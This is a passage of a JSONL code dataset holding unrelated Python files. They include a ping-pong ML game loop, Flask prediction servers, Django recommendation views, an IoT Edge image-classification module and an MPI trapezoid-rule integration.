(title95MatchedRecords, matchesJson)\n venueResults = calculateOverlap (venueMatchedRecords, matchesJson)\n authorResults = calculateOverlap (authorMatchedRecords, matchesJson)\n yearResults = calculateOverlap (yearMatchedRecords, matchesJson)\n combinedResults = calculateOverlap (combinedMatchedRecords, matchesJson)\n \n \n header = [\"precision\", \"recall\", \"F\"]\n rows = zip(header, doiURLresults, titleResults, title80Results, title95results, venueResults, authorResults, yearResults, combinedResults)\n directory= \"data/overlapGoldenSample/\"\n with open(str(directory+\"testResults.csv\"), 'a') as myfile:\n wr = csv.writer(myfile, delimiter=\";\")\n \n \n for val in rows:\n wr.writerow(val)\n \n print(\"resetting tables\")\n doiUrlmatchedRecords = []\n titleMatchedRecords = []\n title80MatchedRecords = []\n 
authorMatchedRecords = []\n yearMatchedRecords = []\n title95MatchedRecords = []\n venueMatchedRecords = []\n combinedMatchedRecords = []\n \n \n #(metadataprecision, metadatarecall, metadataURLf) = calculateOverlap (doiUrlmatchedRecords, matchesJson)\n","sub_path":"overlap analysis/2017_11_overlap_experiment_combine_all_methods.py","file_name":"2017_11_overlap_experiment_combine_all_methods.py","file_ext":"py","file_size_in_byte":23691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"600366419","text":"import pygame\nimport time\nimport os.path\n\nfrom mlgame.gamedev.generic import quit_or_esc\nfrom mlgame.communication import game as comm\n\nfrom . import gamecore\nfrom .pingpong import Screen\nfrom .gamecore import GameStatus, PlatformAction, Scene\nfrom .record import get_record_handler\n\nclass PingPong:\n \"\"\"\n The game core for the machine learning mode\n \"\"\"\n def __init__(self, fps: int, difficulty, game_over_score: int, record_progress):\n \"\"\"\n Constructor\n\n @param fps The fps of the game\n @param difficulty The difficulty of the game\n @param game_over_score The game will stop when either side reaches this score\n @param record_progress Whether to record the game process or not\n \"\"\"\n self._ml_1P = \"ml_1P\"\n self._ml_2P = \"ml_2P\"\n self._ml_execute_time = 1.0 / fps\n self._frame_delayed = [0, 0] # 1P, 2P\n self._score = [0, 0] # 1P, 2P\n self._game_over_score = game_over_score\n\n self._record_handler = get_record_handler(record_progress, \"ml_\" + str(difficulty))\n\n self._scene = Scene(difficulty)\n self._screen = Screen(Scene.area_rect.size, self._scene.draw_gameobjects)\n\n def game_loop(self):\n \"\"\"\n The main loop of the game execution\n \"\"\"\n comm.wait_all_ml_ready()\n\n while not quit_or_esc():\n scene_info = self._scene.get_scene_info()\n\n # Send the scene info to the ml processes and wait for commands\n command_1P, command_2P = self._make_ml_execute(scene_info)\n\n scene_info[\"command_1P\"] = command_1P.value\n scene_info[\"command_2P\"] = command_2P.value\n self._record_handler(scene_info)\n\n # Update the scene\n game_status = self._scene.update(command_1P, command_2P)\n\n self._screen.update(self._score, self._scene._ball.speed)\n\n # If either of two sides wins, reset the scene and wait for ml processes\n # getting ready for the next round\n if game_status != GameStatus.GAME_ALIVE:\n scene_info = self._scene.get_scene_info()\n comm.send_to_all_ml(scene_info)\n\n scene_info[\"command_1P\"] = scene_info[\"command_2P\"] = None\n self._record_handler(scene_info)\n\n print(\"Frame: {}, Status: {}\"\n .format(scene_info[\"frame\"], game_status.value))\n\n if self._game_over(game_status):\n break\n\n self._scene.reset()\n self._frame_delayed = [0, 0]\n # Wait for ml processes doing their resetting jobs\n comm.wait_all_ml_ready()\n\n self._print_result()\n\n def _make_ml_execute(self, scene_info):\n \"\"\"\n Send the scene_info to the ml process and wait for the instructions\n \"\"\"\n comm.send_to_all_ml(scene_info)\n time.sleep(self._ml_execute_time)\n cmd_received = comm.recv_from_all_ml()\n\n game_cmd_1P = self._process_cmd(cmd_received[self._ml_1P], self._ml_1P)\n game_cmd_2P = self._process_cmd(cmd_received[self._ml_2P], self._ml_2P)\n\n self._check_frame_delayed(0, self._ml_1P,\n scene_info[\"frame\"], game_cmd_1P[\"frame\"])\n self._check_frame_delayed(1, self._ml_2P,\n scene_info[\"frame\"], game_cmd_2P[\"frame\"])\n\n return game_cmd_1P[\"command\"], game_cmd_2P[\"command\"]\n\n 
def _process_cmd(self, cmd_received, ml_name):\n        \"\"\"\n        Check if the type of the command and the value are valid.\n        Then return the validated command.\n        \"\"\"\n        error_msg = \"Received invalid command from '{}': %(reason)s\".format(ml_name)\n        cmd_processed = {\"frame\": -1, \"command\": PlatformAction.NONE}\n\n        # If it doesn't receive the command from the client, return the default one.\n        if not cmd_received:\n            return cmd_processed\n\n        # Type checking and value checking\n        try:\n            if not isinstance(cmd_received, dict):\n                raise TypeError(\"the game command\", \"dict\")\n            if not isinstance(cmd_received[\"frame\"], int):\n                raise TypeError(\"'frame'\", \"int\")\n            if not isinstance(cmd_received[\"command\"], str):\n                raise TypeError(\"'command'\", \"str\")\n\n            cmd_processed[\"frame\"] = cmd_received[\"frame\"]\n            cmd_processed[\"command\"] = PlatformAction(cmd_received[\"command\"])\n        except KeyError as e:\n            print(error_msg % {\"reason\": \"Missing {}\".format(e)})\n        except TypeError as e:\n            print(error_msg % {\"reason\":\n                \"Wrong type of {}. Should be '{}'.\".format(*e.args)})\n        except ValueError as e:\n            print(error_msg % {\"reason\": str(e)})\n\n        return cmd_processed\n\n    def _check_frame_delayed(self, ml_index, ml_name, scene_frame, instruct_frame):\n        \"\"\"\n        Update the `frame_delayed` if the received instruction frame is delayed\n        \"\"\"\n        if (instruct_frame != -1 and\n            scene_frame - instruct_frame > self._frame_delayed[ml_index]):\n            self._frame_delayed[ml_index] = scene_frame - instruct_frame\n            print(\"{} delayed {} frame(s)\"\n                .format(ml_name, self._frame_delayed[ml_index]))\n\n    def _game_over(self, status):\n        if status == GameStatus.GAME_1P_WIN:\n            self._score[0] += 1\n        elif status == GameStatus.GAME_2P_WIN:\n            self._score[1] += 1\n        else: # Draw game\n            self._score[0] += 1\n            self._score[1] += 1\n\n        return (self._score[0] == self._game_over_score or\n            self._score[1] == self._game_over_score)\n\n    def _print_result(self):\n        if self._score[0] > self._score[1]:\n            win_side = \"1P\"\n        elif self._score[0] == self._score[1]:\n            win_side = \"No one\"\n        else:\n            win_side = \"2P\"\n\n        print(\"{} wins! 
Final score: {}-{}\".format(win_side, *self._score))\n","sub_path":"games/pingpong/game/pingpong_ml.py","file_name":"pingpong_ml.py","file_ext":"py","file_size_in_byte":5976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"411585932","text":"# This is from Python Crash Course from Chapter 8, exercise 13\r\n\r\n\r\ndef build_profile(first, last, **user_info):\r\n \"\"\"Build a dictionary containing everything we know about a user.\"\"\"\r\n profile = {}\r\n profile['first_name'] = first\r\n profile['last_name'] = last\r\n for key, value in user_info.items():\r\n profile[key] = value\r\n return profile\r\n\r\n\r\nbuild_profile('Sarah', 'G', hair_color='Blonde', pets='Dog', sex='woman')\r\n","sub_path":"pcc_ex8-13.py","file_name":"pcc_ex8-13.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"432028231","text":"import os\r\nfrom flask import Flask, jsonify, request\r\n\r\nimport json\r\nfrom prediction import predict\r\n\r\n\r\nHEADERS = {'Content-type': 'application/json', 'Accept': 'text/plain'}\r\n\r\ndef flask_app():\r\n app = Flask(__name__)\r\n\r\n\r\n @app.route('/healthz', methods=['GET'])\r\n def healthz():\r\n message = {\"status\": \"Aal is well!!!\"}\r\n response = jsonify(message)\r\n response.status_code = 200\r\n return response\r\n\r\n @app.route('/predict', methods=['POST'])\r\n def start():\r\n input_text = request.json\r\n return jsonify(predict(input_text['text']))\r\n return app\r\n\r\nif __name__ == '__main__':\r\n app = flask_app()\r\n app.run(debug=True, host='0.0.0.0', port=3000)\r\n","sub_path":"dyn-cust-feedback/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"101465196","text":"from flask import Flask,url_for,redirect,render_template,request,session\nfrom flask_sqlalchemy import SQLAlchemy\nfrom datetime import datetime\nfrom time import sleep\nimport pandas as pd\nimport numpy as np\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.model_selection import train_test_split\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport random\n\napp = Flask(__name__)\napp.secret_key = \"Priyansh\"\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///test.db'\napp.jinja_env.globals.update(isinstance=isinstance)\n\n@app.route('/')\ndef index():\n return redirect(url_for('Home'))\n\n@app.route('/Home')\ndef Home():\n return render_template(\"index.html\")\n\n@app.route('/base')\ndef base():\n return render_template(\"base.html\")\n\n@app.route('/tool' , methods=[\"GET\",\"POST\"])\ndef tool():\n\n if request.method == \"POST\":\n user_dict = {}\n current_sem = request.form['current_sem']\n #user_dict[\"Name\"] = request.form[\"name\"]\n user_dict[\"Current sem\"] = current_sem\n for i in range(1,int(current_sem)):\n temp_list = []\n temp_list.append(int(request.form[\"Attendance_\"+str(i)]))\n temp_list.append(int(request.form[\"Events_\"+str(i)]))\n temp_list.append(int(request.form[\"Sem_Percent_\"+str(i)]))\n user_dict[\"Sem \"+str(i)] = temp_list\n user_dict[\"Tech skills\"] = int(request.form[\"tech_skills\"])\n user_dict[\"Backlogs\"] = request.form[\"backlogs\"]\n\n backlogs = int(user_dict[\"Backlogs\"])\n backlogs_percentage = (backlogs * 100)/32\n final_backlog_percent = 100 - backlogs_percentage\n user_dict[\"Backlogs\"] = 
final_backlog_percent\n\n \n data = user_dict\n current_sem = int(data[\"Current sem\"])\n df=pd.DataFrame(data)\n train = df.drop([\"Current sem\"],axis=1)\n temp_list = []\n for i in range(1,current_sem):\n temp_list.append(\"Sem \"+str(i))\n print(train) \n test = df[temp_list]\n print(test)\n X_train,X_test,Y_train,Y_test = train_test_split(train,test,test_size=0.3,random_state=2)\n regr = LinearRegression()\n regr.fit(X_train,Y_train)\n pred = regr.predict(X_test)\n pred=np.average(pred)\n pred = int(pred)\n CGPA = pred/10+0.5\n\n #Data Visualization\n counter=int(data[\"Current sem\"])\n list1=[]\n for i in range(1,counter):\n list1.append(data[\"Sem \"+str(i)])\n a=list1\n new_dict = {key:val for key, val in data.items() if key not in ('Current sem','Tech skills','Backlogs') } \n xaxis = list(new_dict.keys()) # semester values and keys\n new_dict_1 = {key:val for key, val in data.items() if key == 'Current sem'} \n new_dict_1 = list(new_dict_1.keys())\n xaxis.append(new_dict_1[0])\n xaxis_att = list(new_dict.keys())\n list2=[] #converted attendance into a list\n for i in range(0,counter-1):\n list2.append(list1[i][0])\n\n list3=[]\n for i in range(0,counter-1):\n list3.append(list1[i][2])\n \n predicted_score = pred\n list3.append(predicted_score)\n print(list3)\n\n random_number = str(random.randint(0,1000))\n\n #Creating a bar graph from the filtered data\n\n fig = plt.figure(figsize = (6, 4)) \n colors = []\n bar_chart = dict(zip(xaxis, list3)) \n for key, val in bar_chart.items(): \n if key == 'Current sem':\n colors.append('red')\n else:\n colors.append('blue')\n\n # creating the bar plot for grades\n plt.bar(bar_chart.keys(), bar_chart.values(), color = colors,width = 0.3) \n \n plt.xlabel(\"Semester\") \n plt.ylabel(\"semester percentage(%)\") \n plt.title(\"Students percentages(%) by Semester\") \n plt.savefig(\"static/images/Graphs/Grade_Bar_graph_\"+random_number+\".png\")\n\n #Grade rise according to semesters\n '''b = sns.kdeplot(list3, shade=True)\n b.axes.set_title('Grade rise according to semesters', fontsize = 15)\n b.set_xlabel('Grade', fontsize = 20)\n b.set_ylabel('Count', fontsize = 20)\n grade_rise_fig = b.get_figure()\n grade_rise_fig.savefig(\"static/images/Graphs/Grade_rise_\"+random_number+\".png\")'''\n\n # creating the bar plot for attendance\n\n fig = plt.figure(figsize = (6, 4)) \n plt.bar(xaxis_att, list2, color ='blue', width = 0.3) \n plt.xlabel(\"Semester\") \n plt.ylabel(\"Attendance(%)\") \n plt.title(\"Students Attendance(%) by Semester\") \n plt.savefig(\"static/images/Graphs/Attendance_Bar_graph_\"+random_number+\".png\")\n\n #Filtering the data to be passed. 
Doesn't affect the prediction\n        if(user_dict[\"Tech skills\"]==1):\n            user_dict[\"Tech skills\"]=\"Yes\"\n        elif(user_dict[\"Tech skills\"]==-1):\n            user_dict[\"Tech skills\"]=\"No\"\n        user_dict[\"Backlogs\"]=request.form[\"backlogs\"]\n\n        return render_template(\"result.html\" , data = user_dict , final_grade = pred , CGPA=CGPA, Grade_bar_graph = \"static/images/Graphs/Grade_Bar_graph_\"+random_number+\".png\" , Attendance_bar_graph=\"static/images/Graphs/Attendance_Bar_graph_\"+random_number+\".png\")\n    else:\n        return render_template(\"form.html\")\n\nif __name__ == '__main__':\n    app.run(debug = True)\n","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"498594332","text":"from waitress import serve\nfrom pyramid.paster import get_app, setup_logging\nimport os, argparse\n\n# ======================================================================================================================\n\n# check and fill missing environment variables.\n# ones with None are optional.\nenvironmental = dict(PROTEIN_DATA='../protein-data',\n                     SECRETCODE='ERROR',\n                     SQL_URL='sqlite:///demo.db',\n                     MICHELANGLO_URL='localhost:8088',\n                     VENUS_URL='localhost:8088/venus',\n                     SENTRY_DNS_MICHELANGLO=None,\n                     PUPPETEER_CHROME=None, # will crash puppeteer\n                     SLACK_WEBHOOK=None,\n                     ADMIN_EMAIL=None,\n                     SERVER_EMAIL=None,\n                     )\n\nfor ev in environmental:\n    if ev in os.environ:\n        print(f'Environment variable {ev}: present')\n    elif environmental[ev] is None:\n        print(f'Environment variable {ev}: skipping')\n    else:\n        print(f'Environment variable {ev}: defaulting to {environmental[ev]}')\n        os.environ[ev] = environmental[ev]\n\n# ======================================================================================================================\n\n# custom `app.py` due to os.environs...\nparser = argparse.ArgumentParser()\nparser.add_argument('--d', action='store_true', help='run in dev mode')\nif parser.parse_args().d:\n    print('*'*10)\n    print('RUNNING IN DEV MODE')\n    print('*' * 10)\n    configfile = 'development.ini'\nelse:\n    configfile = 'production.ini'\n\n# ======================================================================================================================\n\nsetup_logging(configfile)\napp = get_app(configfile, 'main', options={'SQL_URL': os.environ['SQL_URL']}) #pyramid.router.Router\n\n# ======================================================================================================================\n\nif __name__ == '__main__':\n    serve(app, host='0.0.0.0', port=8088, threads=50)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"239402264","text":"import os\r\nimport cv2\r\nimport numpy as np\r\nimport xml.etree.ElementTree as ET\r\npath = \"/media/ubuntu/harddisk1/data/annotations/general/xml\"\r\nfiles = [x for x in os.listdir(path) if x.endswith('.xml')]\r\nfilePath = []\r\nobjects_set=set()\r\nbox_num = 0\r\nfor filename in files:\r\n    filePath.append(path +'/'+ filename)\r\nfor fileEverPath in filePath:\r\n    try:\r\n        tree = ET.parse(fileEverPath)\r\n        root = tree.getroot()\r\n        img_name = root.find('filename').text\r\n        objects = root.findall('object')\r\n        box_num += len(objects)\r\n        for object in objects:\r\n            obj_name = object.find('name').text\r\n            objects_set.add(obj_name)\r\n    except Exception as err:\r\n        os.remove(fileEverPath)\r\n        
print(fileEverPath+' deleted')\r\n\r\nprint(objects_set)\r\nprint(len(objects_set))\r\nprint(box_num)\r\n","sub_path":"data_tools/统计所有的种类.py","file_name":"统计所有的种类.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"462982079","text":"from mongokit import *\nimport time\n\nclass Adress(Document):\n    structure = {\n        'id' : int,\n        'name' : unicode,\n        'street' : unicode,\n        'city' : unicode,\n        'zip' : unicode,\n    }\n    skip_validation = True\n\n\ndef CalTime():\n    connection = Connection() \n    connection.register([Adress])\n    \n    for i in range(100000):\n        addr = connection.foo.foo.Adress()\n        addr['name'] = u'Andreas Jung'\n        addr['street'] = u'xxxxxxxxxxxxx'\n        addr['city'] = u'xxxxxx'\n        addr['zip'] = u'72070'\n        addr.save()\n\n#if __name__ == \"__main__\":\n#    start = time.time()\n#    CalTime()\n#    elapsed = (time.time() - start)\n#    print elapsed\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"mapreduce.py","file_name":"mapreduce.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"177474822","text":"from sklearn.svm import SVR\n\nfrom src.config import PP_DICT, FULL_DATA_DICT\nfrom src.model.utils import train_test_model\n\n# Optimal GS Params\nparams = {'C': 1,\n          'epsilon': 0.2,\n          'kernel': 'rbf',\n          'shrinking': True,\n          'tol': 0.001}\n\npp_dict = PP_DICT\ndata_dict = FULL_DATA_DICT\n\npipeline, m_err, r2 = train_test_model(SVR(), params, data_dict, pp_dict, save_model=True)\n","sub_path":"src/model/svr.py","file_name":"svr.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"591917255","text":"#\n# CAMP\n#\n# Copyright (C) 2017, 2018 SINTEF Digital\n# All rights reserved.\n#\n# This software may be modified and distributed under the terms\n# of the MIT license. 
See the LICENSE file for details.\n#\n\n\n\nfrom unittest import TestCase\n\nfrom camp.commands import Command, Execute\n\n\n\nclass LongOptionsAreAccepted(TestCase):\n\n    def test_given_a_configuration_file(self):\n        command_line = [\"execute\", \"--config\", \"config.yml\"]\n\n        command = Command.extract_from(command_line)\n\n        self.assertIsInstance(command, Execute)\n        self.assertEqual(\"config.yml\",\n                         command.configuration_file)\n\n\n    \nclass ShortOptionsAreAccepted(TestCase):\n\n    def test_given_a_configuration_file(self):\n        command_line = [\"execute\", \"-c\", \"config.yml\"]\n\n        command = Command.extract_from(command_line)\n\n        self.assertIsInstance(command, Execute)\n        self.assertEqual(\"config.yml\",\n                         command.configuration_file)\n\n\n\nclass DefaultValuesAreCorrect(TestCase):\n\n    def test_when_no_argument_is_given(self):\n        command_line = [\"execute\"]\n\n        command = Command.extract_from(command_line)\n\n        self.assertIsInstance(command, Execute)\n        self.assertEqual(Execute.DEFAULT_CONFIGURATION_FILE,\n                         command.configuration_file)\n","sub_path":"tests/commands/test_execute.py","file_name":"test_execute.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"372012444","text":"from django.views.generic import ListView\n\nfrom .user_cf import UserBasedCF\nfrom .item_cf import ItemBasedCF\nfrom products.models import Product\n\n\nclass UserBasedRecommendationView(ListView):\n    template_name = 'recommendations/list.html'\n\n    def get_context_data(self, *args, **kwargs):\n        context = super(UserBasedRecommendationView, self).get_context_data(*args, **kwargs)\n        return context\n\n    def get_queryset(self, *args, **kwargs):\n        request = self.request\n        user = request.user\n        user_based_cf = UserBasedCF()\n        recommendations = user_based_cf.recommend(user)\n        ids = [item[0] for item in recommendations]\n        return Product.objects.filter(id__in=ids)\n\n\nclass ItemBasedRecommendationView(ListView):\n    template_name = 'recommendations/list.html'\n\n    def get_context_data(self, *args, **kwargs):\n        context = super(ItemBasedRecommendationView, self).get_context_data(*args, **kwargs)\n        return context\n\n    def get_queryset(self, *args, **kwargs):\n        request = self.request\n        user = request.user\n        item_based_cf = ItemBasedCF()\n        recommendations = item_based_cf.recommend(user)\n        ids = [item[0] for item in recommendations]\n        return Product.objects.filter(id__in=ids)\n\n\nclass UserItemRecommendationView(ListView):\n    template_name = 'recommendations/list.html'\n\n    def get_context_data(self, *args, **kwargs):\n        context = super(UserItemRecommendationView, self).get_context_data(*args, **kwargs)\n        return context\n\n    def get_queryset(self, *args, **kwargs):\n        request = self.request\n        user = request.user\n\n        user_based_cf = UserBasedCF()\n        user_based_recommendations = user_based_cf.recommend(user)\n        user_based_ids = [item[0] for item in user_based_recommendations]\n\n        item_based_cf = ItemBasedCF()\n        item_based_recommendations = item_based_cf.recommend(user)\n        item_based_ids = [item[0] for item in item_based_recommendations]\n\n        ids = list(set(user_based_ids) | set(item_based_ids))\n        return Product.objects.filter(id__in=ids)\n","sub_path":"src/recommendations/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2106,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"208230153","text":"# Define functions\nfrom flask import session,current_app,g\nfrom info.models import User\nfrom 
functools import wraps\n\n\ndef do_rank(index):\n    '''Return 'first', 'second' or 'third' according to the index'''\n    if index == 1:\n        return 'first'\n    elif index == 2:\n        return 'second'\n    elif index == 3:\n        return 'third'\n    else:\n        return ''\n\n# view_func == news_detail\ndef user_login_data(view_func):\n    \"\"\"Custom decorator that fetches the logged-in user's information\n    Note: a plain decorator would change the decorated function's __name__ attribute to 'wrapper'\n    \"\"\"\n\n    # **kwargs == {\"news_id\":1}\n    # Restore the __name__ modified by the decorator, as well as the docstring of the decorated function\n    @wraps(view_func)\n    def wrapper(*args, **kwargs):\n        # Get user_id from the session and use it to query the user's information\n        user_id = session.get('user_id', None)\n        user = None\n        if user_id:\n            # If user_id exists, the user is logged in, so fetch the User model object\n            try:\n                user = User.query.get(user_id)\n            except Exception as e:\n                current_app.logger.error(e)\n\n        # Store the queried user on the g variable so view functions can read it from g again\n        g.user = user\n\n        # Call the decorated function; **kwargs == {\"news_id\":1}\n        return view_func(*args, **kwargs)\n\n    return wrapper\n\n\n\n# def user_login_data():\n#     user_id = session.get('user_id')\n#     user = None\n#     try:\n#         user = User.query.get(user_id)\n#     except Exception as e:\n#         current_app.logger.error(e)\n#     return user","sub_path":"info/utils/comment.py","file_name":"comment.py","file_ext":"py","file_size_in_byte":1573,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"652954878","text":"# Assignment 7.2: Write a program that prompts for a file name, then opens that file and reads through the file,\n# looking for lines of the form: X-DSPAM-Confidence: 0.8475\n# Count these lines and extract the floating point values from each of the lines and compute the average of those values\n# and produce an output as shown below.\n\n# Use the file name mbox-short.txt as the file name\nfname = input(\"Enter file name: \")\nfhand = open(fname)\n\ntotal = 0\ncount = 0\n\nfor line in fhand:\n    if line.startswith(\"X-DSPAM-Confidence:\"):\n        col = line.find(\":\")\n        substr = line[col+1:]\n        substr = substr.lstrip()\n        num = float(substr)\n        total = total + num\n        count = count + 1\n\naverage = total / count\n\nprint(\"Average spam confidence:\", average)\n\n\n\n\n","sub_path":"Assignment_7.2.py","file_name":"Assignment_7.2.py","file_ext":"py","file_size_in_byte":780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"139556297","text":"\n# coding: utf-8\n\n# In[17]:\n\n\nimport subprocess\n#subprocess.run(['jupyter', 'nbconvert',\n#                '--to', 'python', 'Constants.ipynb'])\n\n#initial value\nN_GENE = 8 # The number of genes.\nN_IND = 300 # The number of individuals in a population.\nCXPB = 0.5 # The probability of crossover.\nMUTPB = 0.2 # The probability of individual mutation.\nMUTINDPB = 0.05 # The probability of gene mutation.\nN_GEN = 40 # The number of generation loops.\n\nALPHA = 0.3 #The constant in the BLX-α crossover function.\n\nTRADE_TYPE = 1 #0: onlyLong, 1: LongShort.\nTRADE_NUM = 150 #The constant to determine the number of trades. #Trade at least once every n days\n","sub_path":"Constants.py","file_name":"Constants.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"582462303","text":"\n\n#class header\nclass _SYPHILIS():\n\tdef __init__(self,): \n\t\tself.name = \"SYPHILIS\"\n\t\tself.definitions = [u'a disease caught during sexual activity with an infected person. 
Syphilis spreads slowly from the sex organs to all parts of the body and often results in death if not treated.']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_syphilis.py","file_name":"_syphilis.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"322453432","text":"# Copyright (c) Microsoft. All rights reserved.\n# Licensed under the MIT license. See LICENSE file in the project root for\n# full license information.\n\nimport random\nimport os\nimport time\nimport sys\nimport iothub_client\nfrom iothub_client import IoTHubModuleClient, IoTHubClientError, IoTHubTransportProvider\nfrom iothub_client import IoTHubMessage, IoTHubMessageDispositionResult, IoTHubError\nimport cv2\nfrom cv2 import cv2\nimport requests\nimport json\nimport imutils\nfrom imutils.video import VideoStream\nimport datetime\n\n# messageTimeout - the maximum time in milliseconds until a message times out.\n# The timeout period starts at IoTHubModuleClient.send_event_async.\n# By default, messages do not expire.\nMESSAGE_TIMEOUT = 10000\nSEND_CALLBACKS = 0\n\n# Choose HTTP, AMQP or MQTT as transport protocol. Currently only MQTT is supported.\nPROTOCOL = IoTHubTransportProvider.MQTT\n\n# Callback received when the message that we're forwarding is processed.\ndef send_confirmation_callback(message, result, user_context):\n global SEND_CALLBACKS\n #print ( \"Confirmation[%d] received for message with result = %s\" % (user_context, result) )\n map_properties = message.properties()\n key_value_pair = map_properties.get_internals()\n #print ( \" Properties: %s\" % key_value_pair )\n SEND_CALLBACKS += 1\n #print ( \" Total calls confirmed: %d\" % SEND_CALLBACKS )\n\ndef send_image(frame,classifier_url):\n \n headers = {'Content-Type': 'application/octet-stream'}\n\n imencoded = cv2.imencode('.jpg',frame)[1]\n try:\n response = requests.post(classifier_url, headers = headers, data = imencoded.tostring())\n prob, item = process_json(response)\n\n if prob > 0.8:\n return prob, item\n else:\n return 0, 'none'\n\n except Exception as e:\n return e\n\ndef process_json(output):\n max_probability = 0\n item = 'none'\n jsonres = output.json()\n for predict in jsonres['predictions']:\n if predict['probability'] > max_probability:\n max_probability = predict['probability']\n item = predict['tagName']\n \n return max_probability, item\n\ndef capture_image_send_message(video_src, classifier_url, hubManager):\n\n webcam = VideoStream(video_src).start()\n print(\"Taking camera from input %s\" % video_src)\n time.sleep(2)\n print(\"Camera initialized...\")\n\n while(True):\n image = webcam.read()\n d1 = datetime.datetime.now()\n try:\n prob, item = send_image(image,classifier_url)\n d2 = datetime.datetime.now()\n d = d2 - d1\n duration = int(round(d.seconds * 1000 + d.microseconds / 1000, 0))\n print(\"[%s ms] I see %s with %f confidence.\" % (duration, item, prob))\n\n except Exception as e:\n print('error')\n \n message = IoTHubMessage(str('test'))\n hubManager.forward_event_to_output(\"outputs\",message,0)\n time.sleep(0.01)\n\nclass HubManager(object):\n\n def __init__(\n self,\n protocol=IoTHubTransportProvider.MQTT):\n self.client_protocol = protocol\n self.client = IoTHubModuleClient()\n self.client.create_from_environment(protocol)\n\n # set the 
time until a message times out\n        self.client.set_option(\"messageTimeout\", MESSAGE_TIMEOUT)\n\n    # Forwards the message received onto the next stage in the process.\n    def forward_event_to_output(self, outputQueueName, event, send_context):\n        self.client.send_event_async(\n            outputQueueName, event, send_confirmation_callback, send_context)\n\ndef main(protocol):\n    try:\n        print ( \"\\nPython %s\\n\" % sys.version )\n        VIDEO_SOURCE = os.getenv('videosource',\"\")\n        FACE_URL = os.getenv('classifierapi',\"\")\n\n        hub_manager = HubManager(protocol)\n        \n        print ( \"Starting the IoT Hub Python Apps using protocol %s...\" % hub_manager.client_protocol )\n\n        while True:\n            capture_image_send_message(VIDEO_SOURCE,FACE_URL, hub_manager)\n            time.sleep(1)\n\n    except IoTHubError as iothub_error:\n        print ( \"Unexpected error %s from IoTHub\" % iothub_error )\n        return\n    except KeyboardInterrupt:\n        print ( \"IoTHubModuleClient sample stopped\" )\n\nif __name__ == '__main__':\n    main(PROTOCOL)","sub_path":"Object Classification DevOps/modules/medium_camera/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"}
{"seq_id":"289166311","text":"from mpi4py import MPI\r\nimport time\r\n\r\ndef f(x):\r\n    return x*x*x*x\r\n\r\ndef Trap(a,b,n,h):\r\n    integral = (f(a) + f(b))/2.0\r\n\r\n    x=a \r\n    for i in range(1,int(n)):\r\n        x = x+h ## 1st loop of process 0: x=0,00097...\r\n        integral = integral + f(x) ## 1st loop of process 0: integral 0,027....\r\n    \r\n    return integral*h\r\n\r\ntic = time.perf_counter()\r\ncomm = MPI.COMM_WORLD # point-to-point communication\r\nmy_rank = comm.Get_rank()\r\np = comm.Get_size()\r\n\r\na=0.0\r\nb=1.0\r\nn=99999\r\ndest=0\r\ntotal=1.0\r\n\r\nh = (b-a)/n\r\nlocal_n = n/p\r\n\r\nlocal_a = a + my_rank*local_n*h\r\nlocal_b = local_a + local_n*h\r\nintegral = Trap(local_a, local_b, local_n, h)\r\n\r\nif my_rank == 0:\r\n    total = integral\r\n    for source in range (1,p):\r\n        integral = comm.recv(source=source)\r\n        print(\"Process \", my_rank, \"<-\", source, \",\", integral,\"\\n\")\r\n        total = total + integral\r\n\r\n    toc=time.perf_counter()\r\n\r\n    print(f\"execution time: {toc - tic:0.4f} seconds\")\r\nelse:\r\n##    print(\"Process \", my_rank, \"->\", dest, \",\", integral,\"\\n\")\r\n    comm.send(integral, dest=0) \r\n\r\nif(my_rank == 0):\r\n    print(\"With n=\", n,\" trapezoids, \\n\")\r\n    print(\"definite integral from\", a, \"to\", b, \"=\", 